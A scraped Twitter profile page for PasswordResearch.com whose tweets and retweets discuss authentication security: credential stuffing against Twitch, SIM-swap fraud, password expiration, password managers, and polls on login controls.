Twitter | Search | |
PasswordResearch.com
Authentication and password security news gathered by Bruce K. Marshall. See the web site for a collection of password research papers and statistics.
2,622
Tweets
325
Following
2,473
Followers
Tweets
PasswordResearch.com retweeted
Lea Kissner Jun 19
The Google privacy engineering team has just open-sourced something amazing: software for (particular) encrypted computation. It's secure, it's fast enough to power real-world applications like detecting if a username and password has been compromised.
Reply Retweet Like
PasswordResearch.com retweeted
Steven Murdoch Jun 13
SMS authentication effectively outsources bank security to phone companies, but victims of SIM-swap fraud pay the cost
Reply Retweet Like
PasswordResearch.com Jun 13
May be more in my research paper index that aren't immediately coming to mind.
Reply Retweet Like
PasswordResearch.com Jun 13
Back in 2015 Google compared the success rates of their options, and provided some feedback on their respective security Here's a more recent general comparison that seems decent And an older one
Reply Retweet Like
PasswordResearch.com Jun 13
Replying to @ShapeSecurity
Also see this comment from Jarrod who works at where they watch the credential stuffing attacks actually happening on the Internet.
Reply Retweet Like
PasswordResearch.com Jun 13
Replying to @PwdRsch
But eliminating email address as identity does break from the predominantly monoculture Internet where leaked account data often takes the form of email+password. So you introduce a hurdle, at least until a significant number of the Internet sites make the same change.
Reply Retweet Like
PasswordResearch.com Jun 13
Replying to @PwdRsch
Twitch is in a somewhat unique position of usernames being mostly public. So an attacker can harvest usernames of at least the more active users, and possibly map them to matching email address prefixes. Otherwise they have to resort back to just popular password guessing.
Reply Retweet Like
PasswordResearch.com Jun 13
Replying to @PwdRsch
I think it does frustrate the script kiddies. If you search for the text Twitch displays about the change, "We have disabled the ability to log in with your email address," you can find at least one hacker forum discussing how to adapt their attacks.
Reply Retweet Like
PasswordResearch.com Jun 13
Results from yesterday's poll on whether switching from email address to username is an effective control for preventing account takeover. Looks like most people don't think it is very effective, which I tend to agree with.
Reply Retweet Like
PasswordResearch.com Jun 12
Replying to @PwdRsch
What's the difference between "somewhat effective" and "somewhat ineffective" you ask? Well... I, uh... Pass?
Reply Retweet Like
PasswordResearch.com Jun 12
Following successful credential stuffing attacks Twitch recently made a change to disallow logins using email addresses instead of usernames. In general, how effective do you believe requiring a username instead of an email is at preventing account takeover attacks?
Reply Retweet Like
PasswordResearch.com Jun 11
Enjoyable and well produced podcast from Conor. Sets a high bar for a first episode and I'm looking forward to his upcoming talks with other guests.
Reply Retweet Like
PasswordResearch.com Jun 6
Stuart discusses both the pros and cons of using password managers. We often recommend "use a password manager" but should also provide some more of the guidance he offers to improve the user experience with them.
Reply Retweet Like
PasswordResearch.com Jun 4
Replying to @ScottJGoldman
I'm not aware of any enterprise password manager that automate the process of setting up account records and generating passwords within the manager software. However, there are some with browser integration that can more gradually prompt users to record and/or change passwords.
Reply Retweet Like
PasswordResearch.com Jun 4
Results from the poll about password expiration indicate that most people don't think the control is worth implementing even if you don't have a better solution for preventing account compromises.
Reply Retweet Like
PasswordResearch.com Jun 4
Replying to @Philipp_Markert
Yeah, there may be little to no value in many cases. But as with other password practices it's easy to push the requirement onto users and say you've done something. I'm uncertain if it's better than nothing.
Reply Retweet Like
PasswordResearch.com Jun 3
Replying to @Philipp_Markert
Password expiration also limits abuse beyond the 90 day window since some attackers may not obtain the password within that window, but after (e.g. in cases of password reuse when it's exposed elsewhere).
Reply Retweet Like
PasswordResearch.com Jun 3
Replying to @Philipp_Markert
It seems (this is where I don't think we have good data) that most attacks are completed within weeks if not days, so password expiration probably helps less in those situations. But we do know that some attackers want to maintain access over months or years.
Reply Retweet Like
PasswordResearch.com Jun 3
Replying to @Philipp_Markert
It depends on the attacker's goals and the platform being attacked. If it's an Windows AD then an attacker can probably escalate domain access before the password expires. If it's a web app or other more contained system they may need to continue relying on the initial account.
Reply Retweet Like
PasswordResearch.com Jun 3
Since worked on their wordlists a few years ago you could contact him and see if he can help or at least point you to the right person.
Reply Retweet Like